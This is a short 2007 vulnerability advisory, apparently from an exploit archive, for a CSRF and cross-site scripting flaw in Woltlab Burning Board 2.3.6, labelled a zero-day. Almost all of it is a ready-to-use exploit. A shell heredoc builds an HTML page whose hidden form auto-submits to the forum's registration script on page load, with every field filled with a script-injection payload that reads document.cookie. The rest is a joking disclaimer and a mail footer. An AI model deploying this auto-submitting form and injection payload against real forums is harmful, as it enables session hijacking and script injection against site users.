woltlab236-xss.txt
Posted on 08 March 2007
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 +--------------------------------------- - -- - | SaMuschie Research Labs proudly presents . . . +------------------------------------------- -- - - | Application: Woltlab Burning Board (wbb) | Version: 2.3.6 (others not testet) | Vuln./Exploit Type: CSRF/XSS | Status: 0day +----------------------------------------- -- - - | Discovered by: Samenspender | Released: 20070302 | SaMuschie Release Number: 5 +------------------------------- - -- - CSRF/XSS Exploit: cat <<EOF > wetpussy.html <form name='evilform' method='POST' action='http://victimhost/wbb2/register.php'> <input type=hidden name=r_username value='"><script>alert("Cookie: " + document.cookie)</script><lol="'> <input type=hidden name=r_email value='"><script>alert("Cookie: " + document.cookie)</script><lol="'> <input type=hidden name=r_password value='"><script>alert("Cookie: " + document.cookie)</script><lol="'> <input type=hidden name=r_confirmpassword value='"><script>alert("Cookie: " + document.cookie)</script><lol="'> <input type=hidden name=key_string value='"><script>alert("Cookie: " + document.cookie)</script><lol="'> <input type=hidden name=key_number value='"><script>alert("Cookie: " + document.cookie)</script><lol="'> <input type=hidden name=r_homepage value='"><script>alert("Cookie: " + document.cookie)</script><lol="'> <input type=hidden name=r_icq value='"><script>alert("Cookie: " + document.cookie)</script><lol="'> <input type=hidden name=r_aim value='"><script>alert("Cookie: " + document.cookie)</script><lol="'> <input type=hidden name=r_yim value='"><script>alert("Cookie: " + document.cookie)</script><lol="'> <input type=hidden name=r_msn value='"><script>alert("Cookie: " + document.cookie)</script><lol="'> <input type=hidden name=r_day value='"><script>alert("Cookie: " + document.cookie)</script><lol="'> <input type=hidden name=r_month value='"><script>alert("Cookie: " + document.cookie)</script><lol="'> <input type=hidden name=r_year value='"><script>alert("Cookie: " + document.cookie)</script><lol="'> <input type=hidden name=r_gender value='"><script>alert("Cookie: " + document.cookie)</script><lol="'> <input type=hidden name=r_signature value='"><script>alert("Cookie: " + document.cookie)</script><lol="'> <input type=hidden name=disablesmilies value='"><script>alert("Cookie: " + document.cookie)</script><lol="'> <input type=hidden name=disablebbcode value='"><script>alert("Cookie: " + document.cookie)</script><lol="'> <input type=hidden name=disableimages value='"><script>alert("Cookie: " + document.cookie)</script><lol="'> <input type=hidden name=r_usertext value='"><script>alert("Cookie: " + document.cookie)</script><lol="'> <input type=hidden name=field%5B1%5D value='"><script>alert("Cookie: " + document.cookie)</script><lol="'> <input type=hidden name=field%5B2%5D value='"><script>alert("Cookie: " + document.cookie)</script><lol="'> <input type=hidden name=field%5B3%5D value='"><script>alert("Cookie: " + document.cookie)</script><lol="'> <input type=hidden name=r_invisible value='"><script>alert("Cookie: " + document.cookie)</script><lol="'> <input type=hidden name=r_usecookies value='"><script>alert("Cookie: " + document.cookie)</script><lol="'> <input type=hidden name=r_admincanemail value='"><script>alert("Cookie: " + document.cookie)</script><lol="'> <input type=hidden name=r_showemail value='"><script>alert("Cookie: " + document.cookie)</script><lol="'> <input type=hidden name=r_usercanemail value='"><script>alert("Cookie: " + document.cookie)</script><lol="'> <input type=hidden name=r_emailnotify value='"><script>alert("Cookie: " + document.cookie)</script><lol="'> <input type=hidden name=r_notificationperpm value='"><script>alert("Cookie: " + document.cookie)</script><lol="'> <input type=hidden name=r_receivepm value='"><script>alert("Cookie: " + document.cookie)</script><lol="'> <input type=hidden name=r_emailonpm value='"><script>alert("Cookie: " + document.cookie)</script><lol="'> <input type=hidden name=r_pmpopup value='"><script>alert("Cookie: " + document.cookie)</script><lol="'> <input type=hidden name=r_showsignatures value='"><script>alert("Cookie: " + document.cookie)</script><lol="'> <input type=hidden name=r_showavatars value='"><script>alert("Cookie: " + document.cookie)</script><lol="'> <input type=hidden name=r_showimages value='"><script>alert("Cookie: " + document.cookie)</script><lol="'> <input type=hidden name=r_daysprune value='"><script>alert("Cookie: " + document.cookie)</script><lol="'> <input type=hidden name=r_umaxposts value='"><script>alert("Cookie: " + document.cookie)</script><lol="'> <input type=hidden name=r_threadview value='"><script>alert("Cookie: " + document.cookie)</script><lol="'> <input type=hidden name=r_dateformat value='"><script>alert("Cookie: " + document.cookie)</script><lol="'> <input type=hidden name=r_timeformat value='"><script>alert("Cookie: " + document.cookie)</script><lol="'> <input type=hidden name=r_startweek value='"><script>alert("Cookie: " + document.cookie)</script><lol="'> <input type=hidden name=r_timezoneoffset value='"><script>alert("Cookie: " + document.cookie)</script><lol="'> <input type=hidden name=r_usewysiwyg value='"><script>alert("Cookie: " + document.cookie)</script><lol="'> <input type=hidden name=r_styleid value='"><script>alert("Cookie: " + document.cookie)</script><lol="'> <input type=hidden name=r_langid value='"><script>alert("Cookie: " + document.cookie)</script><lol="'> <input type=hidden name=send value='send'> <input type=hidden name=sid value=''> <input type=hidden name=disclaimer value='viewed'> </form> <body onload=javascript:document.forms['evilform'].submit();> EOF +----------------------------- -- - | Lameness Disclaimer +------------------------------------- - -- - - | SaMuschie Research Labs was founded to publish | vulnerabilities within well known software products, | which are easy to discover and exploit. | | SaMuschie researchers just spend a minimum of time | and knowledge for each vulnerability. Hence readers of | this advisory are requested not to ask any questions | to the researchers.... they don't know the answer ;) +---------------------------------- - -- - - -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.6 (GNU/Linux) iD8DBQFF6AyiMFgfGpQK8VERAsieAJwIMk+g0Y70cV6dR5YtsMfq4U+5fgCfWWzD Qg6at+bMTnvHbw0SYyXk5ko= =7wPg -----END PGP SIGNATURE----- ___________________________________________________________ Der frühe Vogel fängt den Wurm. Hier gelangen Sie zum neuen Yahoo! Mail: http://mail.yahoo.de
